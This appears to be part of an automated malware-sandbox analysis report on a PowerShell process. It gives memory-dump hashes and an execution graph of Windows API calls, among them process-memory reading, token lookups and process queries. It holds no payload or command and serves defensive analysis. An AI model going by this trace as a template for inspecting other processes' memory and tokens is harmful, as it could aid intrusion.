                                                                                • Opcode ID: 5a798107fcba4478d08aa1b32ceee6c2e8ebc52eec95fe17f28ef6cf22b67ebe
                                                                                • Instruction ID: be203b87090e8f1350351b3f7af25762413e3a66a716199180c697008854b608
                                                                                • Opcode Fuzzy Hash: 5a798107fcba4478d08aa1b32ceee6c2e8ebc52eec95fe17f28ef6cf22b67ebe
                                                                                • Instruction Fuzzy Hash: 78F082B2A0C6498FD798EB6CE4418A877E0FF45324B1940F6E19DCB573CA2AEC41C740
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.101916752489.00007FFB5B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B980000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_7ffb5b980000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: db0a0f5836444e361ff7a94c5ca23d2e27b35de95845f034e8009dff1ed91333
                                                                                • Instruction ID: c8ca36f651a4b2570ee9f153cb4a29293b4b59ad28928132ad7c3caed3d6bb57
                                                                                • Opcode Fuzzy Hash: db0a0f5836444e361ff7a94c5ca23d2e27b35de95845f034e8009dff1ed91333
                                                                                • Instruction Fuzzy Hash: CF52C3A2A0DB890FE396967CD8552B57BE1EF56320B0D41FBF08DCB1A7D91D9C068381
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000C.00000002.101915582457.00007FFB5B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB5B8B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_12_2_7ffb5b8b0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: K_^$K_^$K_^$K_^
                                                                                • API String ID: 0-4267328068
                                                                                • Opcode ID: 68674b3459f2dd42f5fb18269138045810e493fb7bd2253a6e5c3e8014526aed
                                                                                • Instruction ID: 8b7c5559ce787a98cccade4abd8d026ac6f76646fdcdd0f0f6f916b9d0f58f43
                                                                                • Opcode Fuzzy Hash: 68674b3459f2dd42f5fb18269138045810e493fb7bd2253a6e5c3e8014526aed
                                                                                • Instruction Fuzzy Hash: 688126E2A0DA854FE756973C98A91F97FE0FF62324B0C41BBC1858B1E7D91828068381

                                                                                Execution Graph

                                                                                Execution Coverage:5.9%
                                                                                Dynamic/Decrypted Code Coverage:0.4%
                                                                                Signature Coverage:12.7%
                                                                                Total number of Nodes:785
                                                                                Total number of Limit Nodes:9
                                                                                execution_graph 26438 7ffb99019bd0 26439 7ffb99019e88 26438->26439 26440 7ffb99019c88 26438->26440 26533 7ffb9900b0d0 90 API calls 26439->26533 26442 7ffb99019d08 26440->26442 26529 7ffb99049910 26440->26529 26456 7ffb9901b760 26442->26456 26443 7ffb99019e99 26505 7ffb9901dfc0 26443->26505 26447 7ffb99019e3c 26449 7ffb99019e0f 26449->26447 26534 7ffb9904a8d0 149 API calls 26449->26534 26451 7ffb99019f5c 26453 7ffb99019d67 26453->26443 26453->26449 26454 7ffb99019e11 26453->26454 26479 7ffb9900af10 26453->26479 26483 7ffb9900b4a0 26453->26483 26454->26449 26516 7ffb99044aa0 26454->26516 26457 7ffb9901b84b 26456->26457 26475 7ffb9901b7ac 26456->26475 26459 7ffb9901b9be 26457->26459 26460 7ffb9901b854 26457->26460 26458 7ffb9901b9dd 26599 7ffb99017600 26458->26599 26462 7ffb9901b85f 26459->26462 26459->26475 26573 7ffb99045840 26460->26573 26462->26458 26465 7ffb9901b882 26462->26465 26598 7ffb990074c0 HeapFree CloseHandle GetLastError 26465->26598 26467 7ffb9901b94b 26467->26453 26470 7ffb9901b950 26470->26458 26472 7ffb9901b976 26470->26472 26471 7ffb9901b7e0 memcpy 26471->26475 26562 7ffb98ffc900 26472->26562 26475->26458 26475->26470 26475->26471 26535 7ffb9900a4f0 memcpy 26475->26535 26551 7ffb99002950 26475->26551 26476 7ffb9901b98f 26476->26467 26609 7ffb990cc060 68 API calls 26476->26609 26478 7ffb9901bab0 26480 7ffb9900af7e 26479->26480 26481 7ffb9900af33 26479->26481 26480->26453 26481->26480 27149 7ffb9900b0d0 90 API calls 26481->27149 26484 7ffb9900b4bd 26483->26484 26494 7ffb9900b4c2 26484->26494 27150 7ffb9904b110 WaitOnAddress GetLastError 26484->27150 26486 7ffb9900b4d6 27151 7ffb9904ad80 69 API calls 26486->27151 26488 7ffb9900b4de 26488->26494 27152 7ffb9904bf30 87 API calls 26488->27152 26489 7ffb9900b5aa 27153 7ffb9904b110 WaitOnAddress GetLastError 26489->27153 26492 7ffb9900b5af 27154 7ffb9904ad80 69 API calls 26492->27154 26493 7ffb9900b51a 26495 7ffb9900b73d 26493->26495 26499 7ffb9900b577 26493->26499 27157 7ffb9904b3f0 83 API calls 26493->27157 26494->26489 26494->26493 26498 7ffb9900b6a6 26498->26453 26499->26498 27156 7ffb9904bf30 87 API calls 26499->27156 26500 7ffb9900b614 26500->26499 27155 7ffb9904bf30 87 API calls 26500->27155 26501 7ffb9900b5b7 26501->26495 26501->26500 27158 7ffb9904b3f0 83 API calls 26501->27158 26506 7ffb9901e0f0 26505->26506 26507 7ffb9901dfda 26505->26507 26508 7ffb9901b760 130 API calls 26507->26508 26509 7ffb9901e014 26508->26509 26510 7ffb9901e0df 26509->26510 26511 7ffb9901e0b5 26509->26511 26512 7ffb9901e029 26509->26512 26510->26447 26511->26510 26513 7ffb98ffc910 HeapFree 26511->26513 26512->26510 26514 7ffb99017600 3 API calls 26512->26514 26515 7ffb98ffc910 HeapFree 26512->26515 26513->26510 26514->26512 26515->26512 26517 7ffb99044abc 26516->26517 26526 7ffb99044ad0 26516->26526 26517->26449 26518 7ffb99046980 101 API calls 26518->26526 26519 7ffb99044da7 26521 7ffb99049910 70 API calls 26519->26521 26520 7ffb99046220 101 API calls 26520->26526 26521->26517 26522 7ffb99049910 70 API calls 26522->26526 26526->26517 26526->26518 26526->26519 26526->26520 26526->26522 26527 7ffb990799b0 SwitchToThread 26526->26527 27159 7ffb9901f8a0 26526->27159 27325 7ffb99048e70 101 API calls 26526->27325 27326 7ffb99046e20 HeapFree SwitchToThread 26526->27326 27327 7ffb99049680 73 API calls 26526->27327 26527->26526 26530 7ffb9904994b 26529->26530 26532 7ffb9904991d 26529->26532 26530->26442 26532->26530 27387 7ffb99049960 70 API calls 26532->27387 26533->26443 26534->26451 26536 7ffb9900a778 26535->26536 26542 7ffb9900a5a8 26535->26542 26737 7ffb99016170 26536->26737 26541 7ffb990119d0 103 API calls 26543 7ffb9900a7f2 memcpy 26541->26543 26542->26536 26544 7ffb9900a70c 26542->26544 26545 7ffb9900a66c GetProcessTimes 26542->26545 26548 7ffb9900a75e 26543->26548 26610 7ffb990119d0 26544->26610 26547 7ffb9900a6a4 26545->26547 26549 7ffb9900a69d 26545->26549 26771 7ffb99041330 GetLastError 26547->26771 26548->26475 26549->26536 26549->26544 26552 7ffb990029f9 26551->26552 26556 7ffb99002963 26551->26556 26553 7ffb990cc040 68 API calls 26552->26553 26560 7ffb990029df 26553->26560 26554 7ffb99002a0f 26555 7ffb990cc040 68 API calls 26554->26555 26558 7ffb99002a14 26555->26558 26556->26554 26559 7ffb990028e0 5 API calls 26556->26559 26556->26560 26557 7ffb990cc040 68 API calls 26557->26554 26559->26560 26560->26557 26561 7ffb990029e6 26560->26561 26561->26475 26563 7ffb99092a00 26562->26563 26564 7ffb99092a23 26563->26564 26565 7ffb99092a12 26563->26565 26566 7ffb990a4940 2 API calls 26564->26566 26567 7ffb990a491b HeapAlloc 26565->26567 26570 7ffb990a4900 GetProcessHeap 26565->26570 26568 7ffb99092a35 26566->26568 26567->26476 26572 7ffb991a4fd8 26567->26572 26568->26476 26570->26567 26571 7ffb990a4936 26570->26571 26571->26476 27050 7ffb99045040 26573->27050 26575 7ffb9904584b 26576 7ffb99045850 26575->26576 26579 7ffb99045874 26575->26579 26577 7ffb99045858 26576->26577 27066 7ffb99042e40 26576->27066 26577->26462 26597 7ffb990458b0 26579->26597 27078 7ffb9907bcf0 26579->27078 26581 7ffb9904593f 26582 7ffb9907bcf0 73 API calls 26581->26582 26583 7ffb99045956 26582->26583 26587 7ffb99045968 26583->26587 26591 7ffb9904597d 26583->26591 26592 7ffb99045a88 26583->26592 26584 7ffb9904591c 26584->26581 26586 7ffb98ffc910 HeapFree 26584->26586 26585 7ffb990458cf 26585->26581 26585->26584 26588 7ffb99045a48 26585->26588 26586->26581 26589 7ffb98ffc910 HeapFree 26587->26589 26587->26591 26590 7ffb98ffc910 HeapFree 26588->26590 26588->26591 26589->26591 26590->26591 26593 7ffb990459f3 26591->26593 26595 7ffb98ffc910 HeapFree 26591->26595 26591->26597 26592->26591 26594 7ffb98ffc910 HeapFree 26592->26594 26596 7ffb98ffc910 HeapFree 26593->26596 26594->26591 26595->26593 26596->26597 26597->26462 26598->26467 26600 7ffb990177e0 26599->26600 26602 7ffb9901761c 26599->26602 26600->26467 26605 7ffb98ffc910 26600->26605 26601 7ffb98ffc910 HeapFree 26601->26602 26602->26600 26602->26601 26603 7ffb990177cc 26602->26603 26603->26602 27148 7ffb9900be90 CloseHandle GetLastError 26603->27148 26606 7ffb99092a60 HeapFree 26605->26606 26606->26467 26608 7ffb991a4fe8 26606->26608 26609->26478 26611 7ffb990119f5 26610->26611 26623 7ffb99011aba 26610->26623 26612 7ffb99011a9c GetSystemTimes 26611->26612 26613 7ffb99011a43 GetProcessTimes 26611->26613 26615 7ffb99011ac0 26612->26615 26612->26623 26613->26612 26614 7ffb99011a6a 26613->26614 26908 7ffb99041330 GetLastError 26614->26908 26909 7ffb99041330 GetLastError 26615->26909 26616 7ffb99011c54 GetProcessIoCounters 26619 7ffb99011c88 26616->26619 26621 7ffb99011c69 26616->26621 26910 7ffb99041330 GetLastError 26619->26910 26620 7ffb99011a6f 26620->26612 26625 7ffb99011d22 OpenProcessToken 26621->26625 26631 7ffb99011f1f 26621->26631 26623->26616 26623->26621 26624 7ffb99012926 26624->26548 26626 7ffb99011d41 26625->26626 26627 7ffb99011f1a 26625->26627 26626->26631 26632 7ffb99011d54 GetTokenInformation 26626->26632 26917 7ffb99041330 GetLastError 26627->26917 26628 7ffb9901289d memset 26907 7ffb9902f3b0 26628->26907 26629 7ffb99012916 26629->26624 26643 7ffb98ffc910 HeapFree 26629->26643 26634 7ffb9901204c NtQueryInformationProcess 26631->26634 26667 7ffb99011fd1 26631->26667 26691 7ffb99012143 26631->26691 26635 7ffb99011e95 26632->26635 26636 7ffb99011d89 GetProcessHeap 26632->26636 26640 7ffb99012075 26634->26640 26634->26667 26914 7ffb99041330 GetLastError 26635->26914 26641 7ffb99011da1 HeapAlloc 26636->26641 26642 7ffb99011e62 26636->26642 26638 7ffb990128c3 GetModuleFileNameExW 26644 7ffb990128e0 26638->26644 26639 7ffb9901218b ReadProcessMemory 26645 7ffb990121b5 ReadProcessMemory 26639->26645 26646 7ffb9901229a 26639->26646 26640->26639 26653 7ffb990120a6 ReadProcessMemory 26640->26653 26640->26667 26648 7ffb99011f0e CloseHandle 26641->26648 26649 7ffb99011dba GetTokenInformation 26641->26649 26913 7ffb99041330 GetLastError 26642->26913 26643->26624 26662 7ffb99089180 68 API calls 26644->26662 26652 7ffb990122cd 26645->26652 26671 7ffb990121e3 26645->26671 26919 7ffb99041330 GetLastError 26646->26919 26648->26627 26648->26631 26654 7ffb99011ddf 26649->26654 26655 7ffb99011ee0 26649->26655 26650 7ffb99011e67 26650->26648 26682 7ffb99011e8b 26650->26682 26920 7ffb99041330 GetLastError 26652->26920 26660 7ffb990120cd ReadProcessMemory 26653->26660 26661 7ffb99012300 26653->26661 26772 7ffb99004ba0 26654->26772 26915 7ffb99041330 GetLastError 26655->26915 26657 7ffb99012281 26673 7ffb99012441 VirtualQueryEx 26657->26673 26688 7ffb99012550 26657->26688 26660->26661 26663 7ffb990120fc memcpy 26660->26663 26921 7ffb99041330 GetLastError 26661->26921 26662->26629 26813 7ffb99013780 26663->26813 26665 7ffb99011def 26670 7ffb99011e32 26665->26670 26677 7ffb99011e20 26665->26677 26666 7ffb99011e9a 26666->26636 26666->26650 26667->26624 26667->26628 26667->26629 26668 7ffb99011ee5 26674 7ffb99011ef9 26668->26674 26911 7ffb99011500 GetProcessHeap HeapFree GetLastError 26670->26911 26671->26657 26672 7ffb9901223c 26671->26672 26922 7ffb98ffe680 WaitOnAddress GetLastError 26671->26922 26680 7ffb9901224d 26672->26680 26681 7ffb99012370 26672->26681 26683 7ffb9901250f 26673->26683 26684 7ffb99012467 26673->26684 26916 7ffb99011500 GetProcessHeap HeapFree GetLastError 26674->26916 26686 7ffb98ffc910 HeapFree 26677->26686 26918 7ffb990178e0 HeapFree 26680->26918 26689 7ffb99013300 72 API calls 26681->26689 26682->26648 26929 7ffb990178e0 HeapFree 26683->26929 26851 7ffb99013300 26684->26851 26686->26670 26687 7ffb99011e50 26912 7ffb990000f0 CloseHandle GetLastError 26687->26912 26688->26667 26699 7ffb99013300 72 API calls 26688->26699 26694 7ffb99012380 26689->26694 26691->26639 26691->26667 26698 7ffb99012397 26694->26698 26923 7ffb99013190 26694->26923 26695 7ffb9901248a 26695->26683 26708 7ffb990124a0 26695->26708 26696 7ffb99011e5d 26696->26631 26697 7ffb99012534 26697->26688 26704 7ffb98ffc910 HeapFree 26697->26704 26928 7ffb990178e0 HeapFree 26698->26928 26702 7ffb99012738 26699->26702 26706 7ffb99012742 26702->26706 26717 7ffb9901276b 26702->26717 26703 7ffb99012265 26703->26657 26710 7ffb98ffc910 HeapFree 26703->26710 26704->26688 26705 7ffb990123cb 26705->26698 26713 7ffb98ffc910 HeapFree 26705->26713 26706->26667 26715 7ffb98ffc910 HeapFree 26706->26715 26712 7ffb98ffc910 HeapFree 26708->26712 26721 7ffb9901256c 26708->26721 26709 7ffb990123ee 26709->26657 26716 7ffb98ffc910 HeapFree 26709->26716 26710->26657 26711 7ffb990125c5 26711->26688 26714 7ffb98ffc910 HeapFree 26711->26714 26712->26708 26713->26698 26714->26688 26715->26667 26716->26657 26718 7ffb99089180 68 API calls 26717->26718 26720 7ffb990127ad 26718->26720 26719 7ffb990129aa 26723 7ffb990129e1 GetProcessTimes 26719->26723 26724 7ffb99012a19 26719->26724 26930 7ffb99013070 70 API calls 26720->26930 26721->26711 26721->26719 26880 7ffb99089180 26721->26880 26896 7ffb99002c70 26721->26896 26726 7ffb99012a21 26723->26726 26731 7ffb99012a12 26723->26731 26724->26548 26725 7ffb990127c7 26730 7ffb9901282a 26725->26730 26732 7ffb990127cc 26725->26732 26931 7ffb99041330 GetLastError 26726->26931 26729 7ffb99012810 26729->26667 26735 7ffb98ffc910 HeapFree 26729->26735 26730->26729 26733 7ffb98ffc910 HeapFree 26730->26733 26731->26548 26732->26729 26734 7ffb98ffc910 HeapFree 26732->26734 26733->26729 26734->26729 26735->26667 26738 7ffb9901618d 26737->26738 26739 7ffb990161a2 26737->26739 26740 7ffb99089180 68 API calls 26738->26740 26741 7ffb990161a7 26739->26741 26742 7ffb990161ea 26739->26742 26743 7ffb9900a793 26740->26743 26744 7ffb990161ad 26741->26744 26745 7ffb9901621e 26741->26745 26746 7ffb98ffc900 4 API calls 26742->26746 26754 7ffb99011730 26743->26754 26748 7ffb98ffc900 4 API calls 26744->26748 26965 7ffb990cd5a0 26745->26965 26750 7ffb99016208 26746->26750 26749 7ffb990161cb 26748->26749 26749->26743 26752 7ffb990cc040 68 API calls 26749->26752 26750->26743 26751 7ffb990cc040 68 API calls 26750->26751 26753 7ffb990162bd 26751->26753 26752->26750 26755 7ffb9900a7bd 26754->26755 26756 7ffb99011752 26754->26756 26755->26541 26762 7ffb99011772 26756->26762 27046 7ffb99041330 GetLastError 26756->27046 26757 7ffb9901180f GetProcessTimes 26761 7ffb99011852 26757->26761 26767 7ffb9901183f 26757->26767 26758 7ffb990117a8 OpenProcess 26760 7ffb990117c3 26758->26760 26766 7ffb990117c8 26758->26766 27047 7ffb99041330 GetLastError 26760->27047 27048 7ffb99041330 GetLastError 26761->27048 26762->26757 26762->26758 26765 7ffb98ffc900 4 API calls 26768 7ffb99011896 26765->26768 26766->26755 26766->26757 26767->26765 26768->26755 27049 7ffb990cc060 68 API calls 26768->27049 26770 7ffb990119cc 26771->26549 26773 7ffb99004c01 26772->26773 26775 7ffb99004bb1 26772->26775 26773->26665 26774 7ffb99004c28 26780 7ffb99004c44 26774->26780 26782 7ffb99004bf8 26774->26782 26775->26773 26775->26774 26932 7ffb98ffc930 26775->26932 26778 7ffb99004be4 CopySid 26778->26780 26778->26782 26779 7ffb99004c8f 26937 7ffb990cc040 26779->26937 26936 7ffb99041330 GetLastError 26780->26936 26782->26773 26785 7ffb99004cf4 LookupAccountSidW 26782->26785 26784 7ffb99004c49 26784->26773 26791 7ffb98ffc910 HeapFree 26784->26791 26786 7ffb99004d62 26785->26786 26787 7ffb99004d8b 26785->26787 26788 7ffb99004d86 LookupAccountSidW 26786->26788 26790 7ffb98ffc930 2 API calls 26786->26790 26794 7ffb99004e2d 26786->26794 26941 7ffb99041330 GetLastError 26787->26941 26795 7ffb99004df6 26788->26795 26796 7ffb99004e2f 26788->26796 26793 7ffb99004d7d 26790->26793 26791->26773 26793->26788 26797 7ffb99004eb8 26793->26797 26794->26665 26942 7ffb9903f0c0 69 API calls 26795->26942 26943 7ffb99041330 GetLastError 26796->26943 26800 7ffb990cc040 68 API calls 26797->26800 26802 7ffb99004ec5 26800->26802 26801 7ffb99004e0a 26801->26794 26803 7ffb98ffc910 HeapFree 26801->26803 26804 7ffb99004f49 26802->26804 26805 7ffb99004eff 26802->26805 26803->26794 26945 7ffb99041330 GetLastError 26804->26945 26806 7ffb99004f1d LocalFree 26805->26806 26944 7ffb9903f0c0 69 API calls 26805->26944 26810 7ffb99004fe2 26806->26810 26811 7ffb98ffc910 HeapFree 26810->26811 26812 7ffb99004f4e 26810->26812 26811->26812 26812->26665 26814 7ffb99013792 26813->26814 26822 7ffb9901212c 26813->26822 26815 7ffb990137b8 26814->26815 26814->26822 26954 7ffb98ffe680 WaitOnAddress GetLastError 26814->26954 26817 7ffb99013867 26815->26817 26828 7ffb990137c5 26815->26828 26818 7ffb99013300 72 API calls 26817->26818 26819 7ffb9901387a 26818->26819 26821 7ffb99013190 69 API calls 26819->26821 26827 7ffb99013887 26819->26827 26820 7ffb99013812 26820->26822 26825 7ffb98ffc910 HeapFree 26820->26825 26823 7ffb990138b6 26821->26823 26832 7ffb99013950 26822->26832 26823->26827 26829 7ffb98ffc910 HeapFree 26823->26829 26824 7ffb99013912 26824->26822 26830 7ffb98ffc910 HeapFree 26824->26830 26825->26822 26826 7ffb98ffc910 HeapFree 26826->26828 26827->26824 26831 7ffb98ffc910 HeapFree 26827->26831 26828->26820 26828->26826 26829->26827 26830->26822 26831->26827 26833 7ffb9901396c 26832->26833 26834 7ffb99013a9d 26832->26834 26833->26834 26835 7ffb99013986 VirtualQueryEx 26833->26835 26834->26691 26836 7ffb99013a36 26835->26836 26837 7ffb990139a8 26835->26837 26839 7ffb99013a82 26836->26839 26842 7ffb98ffc910 HeapFree 26836->26842 26838 7ffb99013300 72 API calls 26837->26838 26840 7ffb990139c5 26838->26840 26839->26834 26841 7ffb98ffc910 HeapFree 26839->26841 26840->26836 26845 7ffb990139da 26840->26845 26841->26834 26842->26836 26843 7ffb99013b04 26843->26834 26846 7ffb98ffc910 HeapFree 26843->26846 26844 7ffb98ffc910 HeapFree 26844->26845 26845->26844 26848 7ffb99013ab9 26845->26848 26846->26834 26847 7ffb99013bdd 26848->26843 26848->26847 26849 7ffb99089180 68 API calls 26848->26849 26850 7ffb99002c70 69 API calls 26848->26850 26849->26848 26850->26848 26852 7ffb99013330 26851->26852 26853 7ffb99013437 26851->26853 26852->26853 26855 7ffb98ffc900 4 API calls 26852->26855 26854 7ffb990cc040 68 API calls 26853->26854 26856 7ffb99013444 26854->26856 26857 7ffb99013372 26855->26857 26860 7ffb990134c3 26856->26860 26863 7ffb99013300 71 API calls 26856->26863 26857->26853 26858 7ffb9901337b ReadProcessMemory 26857->26858 26859 7ffb990133c3 26858->26859 26864 7ffb990133a8 26858->26864 26955 7ffb99041330 GetLastError 26859->26955 26860->26695 26861 7ffb990133af 26861->26695 26866 7ffb990134fe 26863->26866 26864->26861 26865 7ffb98ffc910 HeapFree 26864->26865 26865->26861 26867 7ffb99013508 26866->26867 26870 7ffb9901352f 26866->26870 26867->26860 26869 7ffb98ffc910 HeapFree 26867->26869 26868 7ffb99089180 68 API calls 26871 7ffb99013579 26868->26871 26869->26860 26870->26868 26956 7ffb99013070 70 API calls 26871->26956 26873 7ffb99013591 26874 7ffb990135df 26873->26874 26875 7ffb99013596 26873->26875 26876 7ffb990135c8 26874->26876 26877 7ffb98ffc910 HeapFree 26874->26877 26875->26876 26879 7ffb98ffc910 HeapFree 26875->26879 26876->26860 26878 7ffb98ffc910 HeapFree 26876->26878 26877->26876 26878->26860 26879->26876 26881 7ffb990891cb 26880->26881 26882 7ffb990891a1 26880->26882 26884 7ffb990cc040 68 API calls 26881->26884 26883 7ffb98ffc900 4 API calls 26882->26883 26895 7ffb990891d0 26882->26895 26885 7ffb990891c6 26883->26885 26886 7ffb99089387 26884->26886 26885->26881 26885->26895 26887 7ffb990893a6 26886->26887 26889 7ffb98ffc910 HeapFree 26886->26889 26957 7ffb990efde0 6 API calls 26887->26957 26888 7ffb99089356 26888->26721 26889->26887 26891 7ffb99091fd0 68 API calls 26891->26895 26892 7ffb990893ae 26958 7ffb99099610 HeapFree WaitForSingleObject RtlNtStatusToDosError 26892->26958 26894 7ffb990893cd 26894->26721 26895->26888 26895->26891 26897 7ffb99002d13 26896->26897 26904 7ffb99002c83 26896->26904 26899 7ffb990cc040 68 API calls 26897->26899 26898 7ffb99002d29 26901 7ffb990cc040 68 API calls 26898->26901 26900 7ffb99002cf9 26899->26900 26902 7ffb990cc040 68 API calls 26900->26902 26906 7ffb99002d00 26900->26906 26903 7ffb99002d2e 26901->26903 26902->26898 26904->26898 26904->26900 26959 7ffb990028e0 26904->26959 26906->26721 26907->26638 26908->26620 26909->26623 26910->26621 26911->26687 26912->26696 26913->26650 26914->26666 26915->26668 26916->26648 26917->26631 26918->26703 26919->26667 26920->26667 26921->26667 26922->26672 26926 7ffb990131b2 26923->26926 26924 7ffb9901325d 26924->26705 26925 7ffb99089180 68 API calls 26925->26926 26926->26924 26926->26925 26927 7ffb99002c70 69 API calls 26926->26927 26927->26926 26928->26709 26929->26697 26930->26725 26931->26731 26933 7ffb99092b30 26932->26933 26946 7ffb990a4940 26933->26946 26935 7ffb99004bdb 26935->26778 26935->26779 26936->26784 26938 7ffb990cc04f 26937->26938 26953 7ffb990cc060 68 API calls 26938->26953 26940 7ffb990cc059 26941->26786 26942->26801 26943->26801 26944->26806 26945->26812 26947 7ffb990a4900 GetProcessHeap 26946->26947 26948 7ffb990a491b HeapAlloc 26946->26948 26947->26948 26951 7ffb990a4936 26947->26951 26948->26935 26952 7ffb991a4fd8 26948->26952 26951->26935 26953->26940 26954->26815 26955->26864 26956->26873 26957->26892 26958->26894 26960 7ffb990028f7 26959->26960 26961 7ffb99002910 26959->26961 26960->26961 26964 7ffb9900290e RtlReAllocateHeap 26960->26964 26962 7ffb9900292a 26961->26962 26963 7ffb98ffc900 4 API calls 26961->26963 26962->26900 26963->26962 26964->26961 26967 7ffb990cd687 26965->26967 26968 7ffb990cd5c2 26965->26968 26966 7ffb990cd6bc 26966->26743 26967->26966 26969 7ffb990cc040 68 API calls 26967->26969 26968->26967 26970 7ffb98ffc900 4 API calls 26968->26970 26971 7ffb990cd711 26969->26971 26970->26967 26972 7ffb990cd72c 26971->26972 26974 7ffb98ffc910 HeapFree 26971->26974 27038 7ffb990efde0 6 API calls 26972->27038 26974->26972 26975 7ffb990cd77e 26975->26743 26976 7ffb990cd734 26976->26975 26977 7ffb990cdf05 26976->26977 26979 7ffb98ffc900 4 API calls 26976->26979 26991 7ffb990cd859 26976->26991 26978 7ffb990cc040 68 API calls 26977->26978 26982 7ffb990cdca1 26978->26982 26981 7ffb990cd850 26979->26981 26980 7ffb990cdb43 26980->26743 26981->26977 26981->26991 26983 7ffb990cdf65 26982->26983 26985 7ffb98ffc910 HeapFree 26982->26985 27039 7ffb990efde0 6 API calls 26983->27039 26985->26983 26986 7ffb990cdf6d 26987 7ffb990ce43a 26986->26987 26989 7ffb98ffc900 4 API calls 26986->26989 27008 7ffb990ce003 26986->27008 26990 7ffb990cc040 68 API calls 26987->26990 26988 7ffb990cf700 69 API calls 26988->26991 26992 7ffb990cdffa 26989->26992 26993 7ffb990ce448 26990->26993 26991->26980 26991->26982 26991->26988 26992->26987 26992->27008 26995 7ffb990ce463 26993->26995 26996 7ffb98ffc910 HeapFree 26993->26996 26994 7ffb990ce3dc 26994->26743 27040 7ffb990efde0 6 API calls 26995->27040 26996->26995 26998 7ffb990ce4e2 26998->26743 26999 7ffb990ce46b 26999->26998 27000 7ffb990ce4dd 26999->27000 27001 7ffb990ce5a7 26999->27001 27002 7ffb98ffc900 4 API calls 26999->27002 27006 7ffb990ce51a memcpy 27000->27006 27041 7ffb990cbf20 68 API calls 27000->27041 27004 7ffb990cc040 68 API calls 27001->27004 27005 7ffb990ce4d4 27002->27005 27003 7ffb990cf700 69 API calls 27003->27008 27007 7ffb990ce5cd 27004->27007 27005->27000 27005->27001 27014 7ffb990ce540 27006->27014 27015 7ffb990ce56e 27006->27015 27010 7ffb990ce5e8 27007->27010 27012 7ffb98ffc910 HeapFree 27007->27012 27008->26994 27008->27003 27042 7ffb990efde0 6 API calls 27010->27042 27012->27010 27017 7ffb990ce550 memcpy 27014->27017 27015->26998 27016 7ffb990ce573 memcpy 27015->27016 27016->26998 27017->27015 27017->27017 27018 7ffb990ce805 27021 7ffb990cc040 68 API calls 27018->27021 27019 7ffb990ce5f0 27019->27018 27020 7ffb990ce67e 27019->27020 27022 7ffb98ffc900 4 API calls 27019->27022 27034 7ffb990ce683 27019->27034 27025 7ffb990ce6cf memcpy 27020->27025 27043 7ffb990cbf20 68 API calls 27020->27043 27023 7ffb990ce812 27021->27023 27024 7ffb990ce675 27022->27024 27028 7ffb990ce82f 27023->27028 27030 7ffb98ffc910 HeapFree 27023->27030 27024->27018 27024->27020 27029 7ffb990ce6fe 27025->27029 27037 7ffb990ce710 27025->27037 27045 7ffb990efde0 6 API calls 27028->27045 27044 7ffb990cbf20 68 API calls 27029->27044 27030->27028 27033 7ffb990ce837 27034->26743 27035 7ffb990ce790 memcpy 27035->27037 27036 7ffb990cbf20 68 API calls 27036->27037 27037->27034 27037->27035 27037->27036 27038->26976 27039->26986 27040->26999 27041->27006 27042->27019 27043->27025 27044->27037 27045->27033 27046->26762 27047->26766 27048->26767 27049->26770 27051 7ffb990473d0 27050->27051 27052 7ffb990473e5 TlsGetValue 27051->27052 27053 7ffb99047477 27051->27053 27055 7ffb99047410 27052->27055 27057 7ffb990473f4 27052->27057 27081 7ffb990a7920 TlsAlloc InitOnceComplete freeaddrinfo 27053->27081 27055->26575 27056 7ffb9904747c TlsGetValue 27056->27055 27056->27057 27057->27055 27058 7ffb98ffc900 4 API calls 27057->27058 27059 7ffb9904742f 27058->27059 27060 7ffb99047491 27059->27060 27061 7ffb99047434 TlsGetValue TlsSetValue 27059->27061 27082 7ffb990cc060 68 API calls 27060->27082 27061->27055 27063 7ffb99047459 27061->27063 27064 7ffb98ffc910 HeapFree 27063->27064 27064->27055 27065 7ffb990474a0 27065->26575 27067 7ffb99042e5d 27066->27067 27068 7ffb99042e75 27066->27068 27070 7ffb99042e6d 27067->27070 27072 7ffb99042ec9 27067->27072 27076 7ffb99042f30 27067->27076 27083 7ffb990a7060 27068->27083 27070->26577 27071 7ffb99042fe9 27071->26577 27072->27070 27073 7ffb99042f10 27072->27073 27074 7ffb98ffc910 HeapFree 27072->27074 27075 7ffb98ffc910 HeapFree 27073->27075 27074->27073 27075->27070 27076->27071 27088 7ffb99049960 70 API calls 27076->27088 27089 7ffb9907be30 27078->27089 27080 7ffb9907bd15 27080->26585 27081->27056 27082->27065 27084 7ffb990a7082 27083->27084 27085 7ffb990a70ee 27083->27085 27084->27085 27086 7ffb990a70c6 WaitOnAddress 27084->27086 27085->27067 27086->27084 27087 7ffb990a70e5 GetLastError 27086->27087 27087->27084 27088->27076 27126 7ffb990a3c40 27089->27126 27092 7ffb9907bebc 27092->27080 27093 7ffb9907bfb7 SetLastError GetEnvironmentVariableW 27099 7ffb9907bfd7 GetLastError 27093->27099 27100 7ffb9907bec4 27093->27100 27095 7ffb9907be6d 27095->27092 27096 7ffb9907bea9 27095->27096 27097 7ffb98ffc910 HeapFree 27095->27097 27098 7ffb98ffc910 HeapFree 27096->27098 27097->27096 27098->27092 27099->27100 27101 7ffb9907c0a4 GetLastError 27099->27101 27100->27093 27102 7ffb9907bff0 GetLastError 27100->27102 27103 7ffb9907c022 27100->27103 27139 7ffb99069bc0 68 API calls 27100->27139 27104 7ffb9907c0bc 27101->27104 27112 7ffb9907c088 27101->27112 27102->27100 27106 7ffb9907c16d 27102->27106 27105 7ffb9907c02b 27103->27105 27103->27106 27107 7ffb98ffc910 HeapFree 27104->27107 27108 7ffb99089180 68 API calls 27105->27108 27114 7ffb98ffc910 HeapFree 27106->27114 27119 7ffb9907c1b6 27106->27119 27107->27112 27109 7ffb9907c03a 27108->27109 27109->27112 27117 7ffb98ffc910 HeapFree 27109->27117 27110 7ffb9907c08d 27110->27092 27113 7ffb98ffc910 HeapFree 27110->27113 27111 7ffb9907c122 27116 7ffb98ffc910 HeapFree 27111->27116 27112->27110 27112->27111 27115 7ffb98ffc910 HeapFree 27112->27115 